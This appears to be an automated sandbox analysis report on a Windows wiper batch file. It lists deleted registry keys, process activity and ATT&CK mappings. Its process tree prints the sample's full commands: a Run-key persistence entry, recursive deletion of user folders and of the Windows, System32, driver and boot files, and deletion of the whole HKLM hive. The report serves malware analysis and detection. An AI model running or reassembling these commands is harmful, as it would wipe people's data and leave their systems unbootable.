Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9FDBF962-061C-44E8-ACFE-779A37343F90}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\Conversion\Readable	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D7053240-CE69-11CD-A777-00DD01143C57}\ProgID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{02B17CB4-7D55-4B34-B38B-10381433441F}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0293-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{000C037D-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.rtf\ShellNew	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0187-ABCDEFFEDCBB}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0353-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{9DC6AC40-EDFA-3E34-9AD1-B7A0A9E3A40A}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A020FAD9-D661-4857-AA43-E6A86FF1163E}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0084-ABCDEFFEDCBA}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\VLC.rmi\shell\Open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{000C036F-0000-0000-C000-000000000046}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.prc	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.wri\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Media Type\Extensions\.m3u	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000208E8-0000-0000-C000-000000000046}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DFFE7FE-3153-4AF1-95D8-F8FCCA97E56B}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0246-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00024490-0000-0000-C000-000000000046}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0042-ABCDEFFEDCBC}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0026-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FD1A378C-F117-4F43-917C-DADCA1308606}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{00D1ACA9-41F2-3340-816E-330175414A56}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.avif\Shell\setdesktopwallpaper	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.flac\ShellEx\{BB2E617C-0920-11D1-9A0B-00C04FC2D6C1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\7-Zip.tgz\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{54AFDECB-0EC4-397D-96AB-8E2A64FD7C3A}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\VisShe.ImageExtractorShellExt	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7372DCE0-F816-4E35-8B42-64B7F50E6395}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0010-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{26170123-45FD-30F7-987D-BF3689662B6C}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0069-ABCDEFFEDCBC}	reg.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

5008 reg.exe

pid	process
5008	reg.exe

Suspicious behavior: LoadsDriver 64 IoCs

Processes:

pid	process
1160
2488
1144
4540
1108
2844
920
3296
2896
2576
4600
768
4228
1156
1568
816
2312
1964
2620
4692
4804
3620
1448
2056
4344
4584
2476
2264
1112
5108
1752
1372
4008
2268
2444
1900
1956
2072
968
2364
2316
1444
2904
2252
4952
1812
1576
4492
3668
4712
2652
4696
784
5068
3656
4684
1716
3824
4004
3124
3140
1892
5008
3760

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

taskkill.exe

description pid process

Token: SeDebugPrivilege 216 taskkill.exe

description	pid	process
Token: SeDebugPrivilege	216	taskkill.exe

Suspicious use of WriteProcessMemory 44 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 1284 wrote to memory of 3500	1284	cmd.exe	reg.exe
PID 1284 wrote to memory of 3500	1284	cmd.exe	reg.exe
PID 1284 wrote to memory of 2124	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 2124	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 552	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 552	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 4824	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 4824	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 3304	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 3304	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 4816	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 4816	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 4420	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 4420	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 1500	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 1500	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 216	1284	cmd.exe	taskkill.exe
PID 1284 wrote to memory of 216	1284	cmd.exe	taskkill.exe
PID 1284 wrote to memory of 4920	1284	cmd.exe	reg.exe
PID 1284 wrote to memory of 4920	1284	cmd.exe	reg.exe
PID 1284 wrote to memory of 2008	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 2008	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 4592	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 4592	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 4052	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 4052	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 212	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 212	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 4112	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 4112	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 2516	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 2516	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 2360	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 2360	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 4484	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 4484	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 5072	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 5072	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 1072	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 1072	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 4624	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 4624	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 5008	1284	cmd.exe	reg.exe
PID 1284 wrote to memory of 5008	1284	cmd.exe	reg.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat"
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1284

C:\Windows\system32\reg.exe
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat /f
2⤵
- Adds Run key to start application
PID:3500

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Users\Admin\Desktop\*
2⤵
PID:2124

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Users\Admin\Pictures\*
2⤵
PID:552

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Users\Admin\Documents\*
2⤵
PID:4824

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Users\Admin\Music\*
2⤵
PID:3304

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Users\Admin\Downloads\*
2⤵
PID:4816

C:\Windows\system32\cmd.exe
cmd.exe /k for /R C:\Users\Admin\AppData\Roaming\ %a in (*) do @echo oops you clicked a sus link and now your files are goooone
2⤵
PID:4420

C:\Windows\system32\cmd.exe
cmd.exe /k RMDIR C:\Windows
2⤵
PID:1500

C:\Windows\system32\taskkill.exe
TASKKILL /F /IM EXPLORER.EXE
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:216

C:\Windows\system32\reg.exe
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat /f
2⤵
- Adds Run key to start application
PID:4920

C:\Windows\system32\cmd.exe
cmd.exe /k RMDIR C:\Windows
2⤵
PID:2008

C:\Windows\system32\cmd.exe
cmd.exe /k ren C:\Windows\System32\LogonUI.exe Youareanidiot.exe.pwned
2⤵
PID:4592

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Users\Admin\AppData\Roaming\*
2⤵
PID:4052

C:\Windows\system32\cmd.exe
cmd.exe /k ren C:\Windows\SysWOW64\* *.minishark
2⤵
PID:212

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Windows\*
2⤵
- Drops file in Windows directory
PID:4112

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Windows\System32\*
2⤵
- Drops file in System32 directory
PID:2516

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Users\Admin\AppData\Roaming\*
2⤵
PID:2360

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\WindowsBoot\*
2⤵
PID:4484

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Windows\System32\winload.exe
2⤵
PID:5072

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Windows\System32\BCD\*
2⤵
PID:1072

C:\Windows\system32\cmd.exe
cmd.exe /k RMDIR C:\Windows\System32\BCD
2⤵
PID:4624

C:\Windows\system32\reg.exe
REG DELETE HKLM /f
2⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Modifies firewall policy service
- Modifies security service
- Manipulates Digital Signatures
- Modifies Installed Components in the registry
- Registers new Print Monitor
- Sets file execution options in registry
- Modifies system executable filetype association
- Registers COM server for autorun
- Adds Run key to start application
- Installs/modifies Browser Helper Object
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Modifies registry key
PID:5008

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Windows\System32\Drivers\*
2⤵
PID:3748

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Windows\*
2⤵
PID:2532

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

6

T1547

Registry Run Keys / Startup Folder

6

T1547.001

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Event Triggered Execution

1

T1546

Change Default File Association

Browser Extensions

Privilege Escalation

Boot or Logon Autostart Execution

6

T1547

Registry Run Keys / Startup Folder

6

T1547.001

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Event Triggered Execution

1

T1546

Change Default File Association

1

T1546.001

Defense Evasion

Modify Registry

11

T1112

Subvert Trust Controls

1

T1553

SIP and Trust Provider Hijacking

1

T1553.003

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Query Registry

5

T1012

Peripheral Device Discovery

2

T1120

System Information Discovery

4

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\22265427411787636826741326151834811518.FUCKYOULMAO
Filesize
27B

MD5
9644e3ba2ce9ddbf0d46353cae08a3d9

SHA1
95dc5c2c66f09a13b9a5c2a9d4f38cab5192febb

SHA256
7f02b3edbe11bef870bea79fda021ecfd6db8b1b307b51f1eae649d5549b60b0

SHA512
1ab5354c16fdc02b0ebc312d4e7e28579861b3172cdc2964c4e49796b1816dfe6c90b8bb4c82a7c506d4c940a6182e11dd446ee22b921285df3c03396e25823a

Download Submit
C:\Users\Admin\Desktop\HACKER2231615224111619878113162804320770537333862714041803272119027573.txt
Filesize
8B

MD5
a911b36535d43a8a9cd54b028ee92236

SHA1
74a5c2013b757dee646e9a2b480a1447fd96d1b3

SHA256
387bda4105dea0edb3d41b38538b9a302a029843d03dfee54724c78c0c241701

SHA512
61b767d5912eb1c3f677c0abf477d828328a39c55e5bee9c4e7336e5a5445020a6b8abfa706f4d8048da9927c0ad77fba4d748d1077bcedd6e3f49b8290e96e3

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads